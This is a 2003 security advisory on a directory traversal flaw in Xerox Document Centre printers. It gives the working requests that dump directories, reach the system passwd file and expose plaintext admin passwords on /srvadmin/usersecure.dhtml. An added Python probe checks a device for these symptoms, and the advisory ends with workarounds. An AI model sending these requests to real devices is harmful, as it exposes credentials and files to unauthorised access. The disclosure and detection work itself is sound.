Security Vulnerability in Xerox Document Centre (Directory Traversal)
22 Dec. 2003
Summary
A security vulnerability has been found in the Xerox Document Centre. It allows remote read access to files on the device, access to the plaintext passwords of the HTTP administration interface, access to the DES-hashed operating system passwords, and read-write access to the HTTP interface's users and passwords.
Vulnerable systems:
* Xerox Document Centre 440DC
* Xerox Document Centre 480DC
* Xerox Document Centre 425ST
* Xerox Document Centre 470
* Xerox Document Centre 255ST
Xerox's web server software for this hardware (it reports itself as "Xerox_MicroServer/Xerox11") returns a binary dump of a directory when the requested URL ends with "/.." or with "/.". Starting from the document root you can therefore walk the directory and file tree and retrieve any file you want.
The server does have a directory traversal blocking mechanism in place, so you cannot get back past the document root: the web server rejects "../" when a request tries to climb back too far.
A request like:
GET /../..
will return "The request had invalid syntax".
However, a request containing a single "../" will not be rejected. Likewise, a request like:
GET /assist/.
will return an "OK" response (with the directory dump described above).
What appears to be happening is that the server counts the "../" groups and compares that count with the total number of "/" in the path.
A request built this way that reaches the system passwd file returns that file (which you can then run crack on).
Even without using "..", you can obtain the plaintext passwords for the HTTP interface by requesting: http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml
From that page you can even create new users; pressing the "Apply new settings" button prompts for the admin password, which is the same password you have just read on that very page.
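As an added example (not part of the original advisory), the following Python script checks a device for the behaviour described above: the "Xerox_MicroServer" banner, the directory dump returned for "/assist/.", the "invalid syntax" answer to "/../..", and whether /srvadmin/usersecure.dhtml is reachable. The host name, the timeout and the threshold used to recognise a binary dump are assumptions; the script does not parse the dump or the password page, it only reports which of the described symptoms are present. Run it only against devices you are authorised to test.

```python
"""Probe a Xerox Document Centre web interface for the symptoms described in
the advisory. Added example; the "binary dump" heuristic and the timeout are
assumptions, not behaviour documented by Xerox."""
import http.client
import sys

# Paths and strings taken from the advisory text.
TRAVERSAL_PROBE = "/assist/."               # expected: 200 plus a binary directory dump
REJECTED_PROBE = "/../.."                   # expected: "The request had invalid syntax"
PLAINTEXT_PASSWORD_PAGE = "/srvadmin/usersecure.dhtml"
BANNER_PREFIX = "Xerox_MicroServer"
PROBES = (TRAVERSAL_PROBE, REJECTED_PROBE, PLAINTEXT_PASSWORD_PAGE)


def is_xerox_microserver(server_header):
    """True if the Server header matches the banner quoted in the advisory."""
    return server_header is not None and server_header.startswith(BANNER_PREFIX)


def looks_like_directory_dump(status, body):
    """Heuristic (assumption): a 200 whose body is more than 5% non-text bytes
    is taken to be the binary directory dump rather than an HTML page."""
    if status != 200 or not body:
        return False
    text_bytes = set(b"\t\n\r") | set(range(0x20, 0x7F))
    nontext = sum(1 for b in body if b not in text_bytes)
    return nontext / len(body) > 0.05


def is_invalid_syntax_response(body):
    """The advisory says over-traversing requests get 'The request had invalid syntax'."""
    return b"invalid syntax" in body.lower()


def fetch(host, path, timeout=5.0):
    """GET path from host and return (status, server_header, body).
    http.client sends the path verbatim, so "/../.." is not normalised away."""
    conn = http.client.HTTPConnection(host, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.getheader("Server"), resp.read()
    finally:
        conn.close()


def assess(results):
    """Turn {path: (status, server, body)} into a list of findings."""
    findings = []
    status, server, body = results[TRAVERSAL_PROBE]
    if is_xerox_microserver(server):
        findings.append("server banner: %s" % server)
    if looks_like_directory_dump(status, body):
        findings.append("directory dump returned for %s" % TRAVERSAL_PROBE)
    _, _, body = results[REJECTED_PROBE]
    if is_invalid_syntax_response(body):
        findings.append("traversal filter present: %s rejected" % REJECTED_PROBE)
    status, _, _ = results[PLAINTEXT_PASSWORD_PAGE]
    if status == 200:
        findings.append("%s reachable without authentication" % PLAINTEXT_PASSWORD_PAGE)
    return findings


def probe(host):
    """Run all probes against host and return the findings."""
    return assess({path: fetch(host, path) for path in PROBES})


if __name__ == "__main__":
    # Usage: python probe_xerox_dc.py xerox_dc_470.example.com
    for finding in probe(sys.argv[1]):
        print(finding)
```

The network part is isolated in fetch(); the decision functions take the raw status, Server header and body, so the same logic can be run over saved responses when checking a device offline.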
Workaround:
* Disable the HTTP interface
* Restrict access permissions to trusted hosts